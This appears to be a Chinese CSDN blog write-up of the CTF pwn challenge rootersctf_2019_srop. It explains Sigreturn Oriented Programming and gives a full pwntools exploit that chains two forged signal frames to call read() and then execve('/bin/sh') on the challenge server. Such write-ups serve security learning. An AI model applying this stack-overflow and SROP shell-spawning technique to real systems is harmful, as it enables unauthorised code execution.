srop学习:【rootersctf_2019_srop】

已于 2022-03-24 20:21:04 修改
阅读量5.5k 收藏 6
点赞数 7
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
于 2022-03-24 20:17:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/123493545
版权

最近学习了一些srop的一些知识,这里通过一道题目来加深一下对srop的运用。

文章目录

1.srop的简单介绍

这里推荐大家一篇文章srop
SROP全称为Sigreturn Oriented Programming,其攻击核心为通过伪造一个‘Signal Frame’(以下简称sigFrame)在栈上,同时触发sigreturn系统调用,让内核为我们恢复一个sigFrame所描述的进程,如一个shell、一个wrtie系统调用打印栈地址等,同时通过对sigFrame中rsp和rip的修改,连接多个sigFrame,可通过多次触发sigreturn系统调用,依次恢复多个sigFrame,实现不同的功能,构成SROP攻击。一个sigFrame可理解为一个进程被挂起时,用于保存进程的数据结构,当进程恢复时,通过触发sigreturn来恢复sigFrame,从而恢复一个进程。

SROP漏洞之所以能构成利用,是因为内核挂起某进程时保存的sigFrame和内核恢复某进程还原sigFrame的两个sigFrame,通过对栈指针寄存器sp的控制,不一致,从而还原出一个攻击者想要的进程。

srop也是通过这样的方式来攻击目标靶机从而get shell或读取flag的.

2.rootersctf_2019_srop题目

例行检查

在这里插入图片描述
64位程序,栈不可执行。

漏洞分析

在这里插入图片描述
函数的主逻辑:
在这里插入图片描述
可以看到汇编语言可供我们用的代码段不是很多,但注意到存在pop_rax_ret,可以控制rax,结合syscall来进行系统调用,这道题目为静态链接,所以我们不能返回libc来算地址,程序中也不存在system,binsh,我们可以利用srop来构造出一个伪造的栈空间,当系统调用sigreturn后,会利用栈上的数据恢复出一个进程,我们这里就可以构造出一个恶意进程。

思路

1.通过在栈上布局好我们的payload,调用完sigreturn后,让内核为我们恢复出一个read(),
2.我们通过read()将binsh读到data段(因为程序可利用的太少,我们考虑使用data段)
3.之后再通过srop来恢复出一个execv(),从而get shell.

exp分析

调用read():

syscall = 0x401033
main = 0x401000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x402000 #data
frame.rdx = 0x100
frame.rip = syscall
frame.rbp = 0x402000 + 0x20 #设置一个buf大小,进而再次栈溢出

io.recvuntil('?')

payload = 'A'*0x88
payload += p64(0x401032)#pop_rax
payload += p64(0xf)   #15号调用
payload += str(frame)

gdb.attach(io)
io.sendline(payload)

在这里插入图片描述
系统调用sigreturn,之后会为我们恢复出read().
在这里插入图片描述
binsh地址有了,
在这里插入图片描述

接下来我们就进行execv()的构造,

frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = 0x402000
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = 0x401033
payload = '/bin/sh\x00'
payload = payload.ljust(0x28,'A')
payload += p64(0x401032)
payload += p64(0xf)
payload += str(frame)

io.sendline(payload)

在这里插入图片描述
构造好的三个参数,从而get shell.

完整exp
from pwn import *
elf = ELF('./rootersctf_2019_srop')
io = remote('node4.buuoj.cn',29654)
#io = process('./rootersctf_2019_srop')
libc = elf.libc
context.log_level='debug'
context.arch ='amd64'

syscall = 0x401033
main = 0x401000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x402000 #data
frame.rdx = 0x100
frame.rip = syscall
frame.rbp = 0x402000 + 0x20

io.recvuntil('?')

payload = 'A'*0x88
payload += p64(0x401032)#pop_rax
payload += p64(0xf)
payload += str(frame)


io.sendline(payload)

frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = 0x402000
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = 0x401033
payload = '/bin/sh\x00'
payload = payload.ljust(0x28,'A')
payload += p64(0x401032)
payload += p64(0xf)
payload += str(frame)
#gdb.attach(io)

io.sendline(payload)

io.interactive()

在这里插入图片描述
喜提flag!!!

Leee333
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SROP
o琦野o的博客
02-03 747
SROPSignal机制Signal机制漏洞Signal机制利用SROP成立的条件常用系统调用调用号64位32位 Signal机制 SROP 的全称是 Sigreturn Oriented Programming 。sigreturn是一个系统调用。  ​ ​当内核向某个进程发起一个 signal ,该进程会被暂时挂起,进入内核。内核会帮用户进程将其上下文保存在该进程的栈上,然后在栈顶填上一个地址 rt_sigreturn ,这个地址指向一段代码,在这段代码中会调用sigreturn系统调用
SROP简单介绍和例题
qq_45595732的博客
03-02 3850
SROP本质是 sigreturn 这个系统调用,主要是将所有寄存器压入栈中,以及压入 signal 信息,以及指向 sigreturn 的系统调用地址。 对于 signal Frame 来说,会因为架构的不同而有所区别,这里给出分别给出 x86 以及 x64 的 sigcontext 。 x86 struct sigcontext { unsigned short gs, __gsh; unsigned short fs, __fsh; unsigned short es, __esh;
SROP学习 smallest & ciscn_s_3
红叶的博客
03-19 461
SROP学习,例题 smallest ,ciscn_s_3
rootersctf_2019_srop
z1r0的博客
03-10 276
rootersctf_2019_srop 查看保护 栈溢出,这一题没有放libc但是有pop rax syscall leave ret所以可以直接使用srop来解决 攻击思路:两次srop 1.构造read(0, data_addr, 0x400)来读入/bin/sh 2.有了/bin/sh之后使用execve这个函数来执行execve("/bin/sh", 0, 0);使得可以getshell 溢出的大小的话buf为0x80所以64位下就是0x88。具体的srop可以看ctf-wiki 这里的dat
SROP——smallest-pwn(360春秋杯)
最新发布
eiennoyoshiki的博客
01-06 1052
缝合了一些我认为比较好的smallest(srop)的wp
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
标题"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm"涉及到的主要知识点是关于无线通信中的误差性能评估,特别是针对正交频分复用(OFDM)系统。描述提到的是一个基于平均平方误差(Mean Square Error,MSE...
csapplab:学习csapp
04-04
3.28-4.4第一周学习总结: 虽然提纲上让先写csapplab,但上周日csapplab做了一下午,就写了3道,还都得找资料,看别人的思路,难顶。。。 然后这周还是将重点放在了ctf上,不过效率还挺高的,嘿嘿,学了泄露libc的...
信息安全_数据安全_eu-16-Sullivan-Towards-A-Policy-.pdf
08-22
攻击与防御之间的军备竞赛仍在继续,各种新的攻击技术如ROP、SROP、JIT-ROP等不断出现,而防御策略也相应地发展出CFI、ROPGuard、BinCFI等一系列工具。尽管如此,寻找一种既实用又安全的解决方案仍然是一个挑战,这...
随机舍入工具箱:MATLAB 工具箱,用于 IEEE 754 浮点算法中的随机舍入基本算术运算。-matlab开发
06-01
健壮的界面* srop:对上述所有内容进行参数检查。 3. 实用功能* twosum:增广求和 [Alg. 4.4, 2] * twoprodfma:增强产品 [Alg. 4.8,2] 1. 中的函数不检查输入参数,因此效率更高但鲁棒性较差。 2. 中的接口检查...
带exp的pwn测试文件
09-12
本主题的“带exp的pwn测试文件”是指一系列用于测试和学习漏洞利用技术的文件,其中“exp”代表exploit,即漏洞利用程序。这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc...
【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 471
【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
SROP利用技术
weixin_33874713的博客
05-12 215
上个周末的“红帽杯”结束了,战队成绩很不错,排名前几。不过有些题目是临时参考网上的思路解出来的,虽然得了分,但当时不是很理解。比赛完了把当时不太熟悉的题目回顾了一下,作为思路的总结和后续的参考。 本篇是针对pwn4的总结。 知道不知道是一种很让人满足的感觉,自己解出题目后,不由得感叹安全研究人员思路的巧妙。拿到PWN4后,在IDA中看了下: 程序非常简短,运行程序后会等待用户输入...
[RootersCTF2019]I_<3_Flask 1&arjun爆破参数
plant1234的博客
10-04 1576
根据测试发现有ssti模板注入。
CTF wiki srop 学习记录
m0_57754423的博客
03-04 342
参考wiki,hollk师傅博客。 说一下我的个人理解,当题目中没有足够的gadget ,可以直接或者间接控制rax,题目中有syscall就可以利用这种攻击手法。 srop: 在unix系统发生signal的时候会执行sigreturn 系统调用。 signal机制: signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。 介绍: 1.内核向某个程序中发送signal机制
BUUCTF:[RootersCTF2019]babyWeb
末初的CSDN博客
08-02 1531
题目地址:https://buuoj.cn/challenges#[RootersCTF2019]babyWeb SQL查询,过滤了:union、sleep、'、"、or、-、benchmark order by测试字段数,发现当order by 2时返回正常order by 3返回没有这个字段,确定为两个字段,一个为uniqueid另一个应该就是flag 那么应该就是输入id判断登录,即可,尝试万能密码登录:1 || 1=1 limit 0,1 返回flag ...
RootersCTF2019 I ♥ Flask
汗的博客
08-29 476
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
BUUCTF pwn rootersctf_2019_xsh
stareforever的博客
02-23 1962
查看保护,基本全开 IDA查看程序 程序读入命令,并通过子函数 run 执行 run函数 对读入的命令进行判断,只能执行ls, echo, zooo指令, 这里可以发现echo 命令存在format string 漏洞, 首先测试可以确定偏移为24 那么整体的思想就是修改程序提供的函数的got表为system@plt,然后再输入内容/bin/sh即可获得shell,目前可以利用的函数为strncmp和strtok函数 首先需要泄露piebase的值,这里介绍覆盖strncmp函数(strtok同理)
BUUCTF pwn wp 131 - 135
fa1c4的blog
04-27 557
rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap
告诉我SROP的原理及利用方法
03-29
SROP(Sigreturn-oriented programming)是一种利用信号处理程序返回(sigreturn)操作来执行攻击代码的技术。 当进程捕获一个信号时,内核会保存当前进程的状态(寄存器状态、堆栈等)并跳转到信号处理程序的地址。在信号处理程序结束后,内核会从保存的状态中恢复进程的状态并继续执行。攻击者可以通过构造特定的信号处理程序返回操作,来修改进程的寄存器状态、堆栈等,从而实现控制进程执行攻击代码的目的。 SROP攻击通常需要满足以下条件: 1. 目标进程必须存在一个可用于触发信号处理程序的信号。 2. 攻击者需要知道信号处理程序的地址。 3. 攻击者需要知道信号处理程序返回操作的系统调用号。 利用SROP攻击可以实现各种攻击目的,例如执行shellcode、绕过ASLR、ROP等。 SROP攻击的防御措施包括: 1. 禁用不必要的信号处理程序。 2. 限制信号处理程序的权限。 3. 检测异常的信号处理程序返回操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值